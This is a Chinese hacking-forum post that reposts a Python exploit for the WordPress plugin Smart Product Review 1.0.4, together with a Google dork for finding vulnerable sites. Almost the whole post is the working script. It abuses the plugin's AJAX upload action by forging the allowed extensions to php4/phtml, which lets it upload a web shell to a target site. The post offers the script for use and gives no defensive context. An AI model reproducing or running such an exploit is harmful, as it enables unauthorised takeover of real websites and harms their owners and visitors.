跳转到帖子
  • 游客您好,欢迎来到黑客世界论坛!您可以在这里进行注册。

    赤队小组-代号1949(原CHT攻防小组)在这个瞬息万变的网络时代,我们保持初心,创造最好的社区来共同交流网络技术。您可以在论坛获取黑客攻防技巧与知识,您也可以加入我们的Telegram交流群 共同实时探讨交流。论坛禁止各种广告,请注册用户查看我们的使用与隐私策略,谢谢您的配合。小组成员可以获取论坛隐藏内容!

    TheHackerWorld官方

Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload


HACK1949

推荐的帖子

# Exploit Title: Wordpress Plugin Smart Product Review 1.0.4 - Arbitrary File Upload
# Google Dork: inurl: /wp-content/plugins/smart-product-review/
# Date: 16/11/2021
# Exploit Author: Keyvan Hardani
# Vendor Homepage: https://demo.codeflist.com/wordpress-plugins/smart-product-review/
# Version: <= 1.0.4
# Tested on: Kali Linux

import os.path
from os import path
import json
import requests;
import time
import sys

def banner():
    animation = "|/-\\"
    for i in range(20):
        time.sleep(0.1)
        sys.stdout.write("\r" + animation[i % len(animation)])
        sys.stdout.flush()
        #do something
    print("Smart Product Review 1.0.4 - Arbitrary File Upload")
    print("Author: Keyvan Hardani (www.github.com/Keyvanhardani)")

def usage():
	print("Usage: python3 exploit.py [target url] [your shell]")
	print("Ex: python3 exploit.py https://example.com ./shell.(php4/phtml)")

def vuln_check(uri):
	response = requests.get(uri)
	raw = response.text

	if ("No script kiddies please!!" in raw):
		return False;
	else:
		return True;

def main():

	banner()
	if(len(sys.argv) != 3):
		usage();
		sys.exit(1);

	base = sys.argv[1]
	file_path = sys.argv[2]

	ajax_action = 'sprw_file_upload_action'
	admin = '/wp-admin/admin-ajax.php';

	uri = base + admin + '?action=' + ajax_action ;
	check = vuln_check(uri);

	if(check == False):
		print("(*) Target not vulnerable!");
		sys.exit(1)

	if( path.isfile(file_path) == False):
		print("(*) Invalid file!")
		sys.exit(1)

	files = {'files[]' : open(file_path)}
	data = {
	"allowedExtensions[0]" : "jpg",
    "allowedExtensions[1]" : "php4",
    "allowedExtensions[2]" : "phtml",
    "allowedExtensions[3]" : "png",
	"qqfile" : "files",
    "element_id" : "6837",
    "sizeLimit" : "12000000",
    "file_uploader_nonce" : "2b102311b7"
	}
	print("Uploading Shell...");
	response = requests.post(uri, files=files, data=data )
	file_name = path.basename(file_path)
	if("ok" in response.text):
		print("Shell Uploaded!")
		print("Shell URL on your Review/Comment");
	else:
		print("Shell Upload Failed")
		sys.exit(1)

main();
            
链接帖子
意见的链接
分享到其他网站

黑客攻防讨论组

黑客攻防讨论组

    You don't have permission to chat.
    • 最近浏览   0位会员

      • 没有会员查看此页面。
    ×
    ×
    • 创建新的...